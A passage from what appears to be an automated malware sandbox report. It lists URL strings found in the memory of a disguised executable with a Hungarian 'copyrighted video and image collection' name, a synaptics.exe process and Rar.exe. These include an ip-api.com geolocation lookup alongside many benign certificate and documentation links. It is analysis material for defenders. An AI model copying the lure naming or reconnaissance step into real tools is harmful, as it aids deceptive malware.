            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD%AF%E4%BB%B6PDF%E9%98%85%E8%AF%BB%E5%99%A8.aspxopen
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://cn.haihaisoft.comhttp://www.haihaisoft.comcnhttp://cn.haihaisoft.com/%E6%B5%B7%E6%B5%B7%E8%BD
            Source: synaptics.exe, 00000023.00000003.1915176286.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1915648123.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/259174/
            Source: synaptics.exe, 00000023.00000002.2456483780.0000000000C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
            Source: synaptics.exe, 00000023.00000003.2039743862.0000000002010000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2045181510.0000000002011000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.00000000020E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577573-compare-algorithms-for-heapqsmallest
            Source: synaptics.exe, 00000023.00000003.2147238249.00000000020F3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2320294846.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.000000000216C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
            Source: synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2456483780.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: synaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2146809732.0000000001F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
            Source: synaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crliE
            Source: synaptics.exe, 00000023.00000003.2147238249.00000000020F3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2320294846.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.000000000216C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
            Source: synaptics.exe, 00000023.00000002.2483896913.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2320294846.000000000217E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.000000000216C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlb
            Source: synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
            Source: synaptics.exe, 00000023.00000002.2479567499.0000000001F60000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2146809732.0000000001F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
            Source: synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
            Source: synaptics.exe, 00000023.00000002.2479567499.0000000001F60000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2146809732.0000000001F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
            Source: synaptics.exe, 00000023.00000002.2456483780.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: synaptics.exe, 00000023.00000003.2319593829.00000000021DC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2264921548.000000000224A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2277527988.000000000224A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2261980733.00000000021CF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2260160456.0000000002248000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2241309089.000000000260E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2240278565.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2486798377.000000000224A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
            Source: synaptics.exe, 00000023.00000002.2487881140.00000000023A4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2444595431.00000000023AA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325645647.00000000023A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs
            Source: synaptics.exe, 00000023.00000003.2245770456.00000000021D9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2244405952.0000000002754000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2261980733.00000000021CF000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2240278565.0000000004971000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
            Source: synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2479567499.0000000001F60000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2322096151.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
            Source: synaptics.exe, 00000023.00000003.2244405952.0000000002754000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.0000000002767000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2496205997.000000000274B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2504866090.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.000000000274B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.0000000002745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
            Source: synaptics.exe, 00000023.00000003.2108776953.0000000001F7E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2108776953.0000000001F92000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2103638638.0000000001F71000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2106086828.00000000025FB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2108461816.00000000044C4000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2112701662.0000000001F61000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
            Source: synaptics.exe, 00000023.00000003.1920160115.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920566894.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo.com/
            Source: synaptics.exe, 00000023.00000003.1920160115.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920566894.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://foo.com:/
            Source: synaptics.exe, 00000023.00000003.2030551439.0000000002137000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2101481574.0000000002104000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2075242644.0000000002106000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.0000000002137000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2086898648.000000000211A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2029822077.00000000023C0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2033832775.0000000001F81000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2091470869.0000000002117000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.0000000002113000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2031465153.0000000001F8B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2054763098.000000000211A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
            Source: synaptics.exe, 00000023.00000003.2094887685.00000000023C9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2030364344.0000000002094000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2021272984.0000000002131000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2023485101.0000000002088000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2221170534.00000000044C3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2153263032.00000000044C2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2029822077.00000000023C0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2177016461.00000000044C3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2112210504.00000000023C9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2080477816.00000000023C9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2053226191.00000000023C9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2159514699.00000000044A0000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2260327170.00000000044C3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2187879815.00000000044C3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2129154477.00000000044C3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2117041797.00000000044C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
            Source: synaptics.exe, 00000023.00000003.2037301715.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2050432494.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2047624052.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2075242644.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2025150545.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2045738697.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2057950737.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2021272984.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2081093217.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.00000000021A8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2016874067.00000000021A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.pkx
            Source: synaptics.exe, 00000023.00000003.2016874067.0000000002123000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2030551439.0000000002124000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2021272984.0000000002123000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2037301715.0000000002124000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2034071702.0000000002124000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
            Source: synaptics.exe, 00000023.00000003.2031465153.0000000001F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/7aaba721ebc0/Lib/socket.py#l252
            Source: synaptics.exe, 00000023.00000002.2534894555.0000000005080000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=8195
            Source: synaptics.exe, 00000023.00000002.2508011307.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2326402328.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2442445774.00000000044FD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2260327170.00000000044F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=8195Z
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://itexmac.sourceforge.net/SyncTeX.htmlJ
            Source: synaptics.exe, 00000023.00000003.2002411335.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com/j2se/1.5.0/docs/api/java/util/concurrent/
            Source: synaptics.exe, 00000023.00000003.1924262655.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1924671044.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mail.python.org/pipermail/python-bugs-list/2001-January/003752.html
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://mailto:EmbeddedFilesTypeFilespecD%s%dR%s%sA%s%sKids.seen.seen.seenNumsSPStD%s.%d:%d:%dInfoPag
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://mupdf.comMuPDFpdf
            Source: synaptics.exe, 00000023.00000003.2266201421.00000000045F9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2290021949.00000000045FB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2481464700.0000000001FE5000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2493576837.000000000266B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325148663.00000000045FB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2327148847.000000000266B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2509773814.00000000045FB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2532783211.0000000005000000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2268319688.00000000045F9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2273874947.00000000045FB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2262898542.00000000045FA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2439987502.0000000002707000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2445684940.00000000045FB000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325645647.00000000023A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-4.pdf
            Source: synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
            Source: synaptics.exe, 00000023.00000003.2161116467.0000000002033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
            Source: synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.esi
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: Rar.exe, 00000016.00000003.1867329681.00000246C1E4C000.00000004.00000020.00020000.00000000.sdmp, Rar.exe, 00000016.00000003.1867329681.00000246C1AAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://p.yusukekamiyamane.com/Yusuke
            Source: synaptics.exe, 00000023.00000003.2219374203.000000000274A000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2216147301.00000000045ED000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.000000000274A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://php.net/manual/en/function.version-compare.php
            Source: synaptics.exe, 00000023.00000003.2053651117.0000000001F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap04.html#tag_04_11
            Source: synaptics.exe, 00000023.00000002.2479567499.0000000001F60000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2146809732.0000000001F70000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2456483780.0000000000C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
            Source: synaptics.exe, 00000023.00000002.2456483780.0000000000C89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/&G
            Source: synaptics.exe, 00000023.00000003.2002411335.0000000002114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.html
            Source: synaptics.exe, 00000023.00000003.2325645647.00000000023B8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2202235071.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2190964614.0000000002019000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2481464700.0000000002019000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
            Source: synaptics.exe, 00000023.00000003.2023485101.0000000002088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc3986#section-5.2.4
            Source: synaptics.exe, 00000023.00000003.2439987502.000000000274F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2496205997.0000000002768000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2244405952.0000000002754000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.0000000002767000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2241309089.000000000269D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2456483780.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
            Source: synaptics.exe, 00000023.00000003.2204296782.0000000002675000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2524332915.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2523286753.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2185500761.000000000263E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5234
            Source: synaptics.exe, 00000023.00000003.1920160115.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920566894.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5234#appendix-B.1
            Source: synaptics.exe, 00000023.00000002.2528538931.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2520058580.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
            Source: synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2252883950.00000000045FC000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2250979227.0000000004699000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004970000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
            Source: synaptics.exe, 00000023.00000003.2101481574.0000000002104000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2075242644.0000000002106000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
            Source: synaptics.exe, 00000023.00000003.2204296782.0000000002675000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2524332915.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2523286753.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2185500761.000000000263E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6455#section-5.2
            Source: synaptics.exe, 00000023.00000003.1920160115.0000000002032000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.1920566894.0000000000D58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc7230#section-3.2)
            Source: synaptics.exe, 00000023.00000003.2053651117.0000000001F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.archive.org/web/20200623061726/https://bitbucket.org/pitrou/pathlib/issues/12/
            Source: synaptics.exe, 00000023.00000003.2248806204.0000000004971000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2519813061.0000000004970000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2248972766.000000000274B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://william.famille-blum.org/William
            Source: synaptics.exe, 00000023.00000003.2161116467.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483055303.0000000002060000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
            Source: synaptics.exe, 00000023.00000003.2147238249.00000000020F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
            Source: synaptics.exe, 00000023.00000003.2161116467.0000000002033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: synaptics.exe, 00000023.00000003.2147238249.00000000020F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
            Source: synaptics.exe, 00000023.00000003.2161116467.0000000002033000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: synaptics.exe, 00000023.00000003.2161116467.0000000002033000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2483896913.00000000020F3000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2147238249.00000000020F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
            Source: A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal..exe, 00000011.00000000.1732556609.00000000006C9000.00000002.00000001.01000000.00000008.sdmp, synaptics.exe, 00000023.00000003.2219374203.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2204296782.000000000267E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2203659542.00000000026C1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2212464293.0000000002675000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2205829752.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000002.2493576837.000000000266B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2212464293.000000000266D000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2327148847.000000000266B000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2211663203.00000000023BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2214567470.0000000002745000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2185500761.000000000263E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2325645647.00000000023B8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2216734824.00000000023BD000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000023.00000003.2202235071.00000000023A1000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 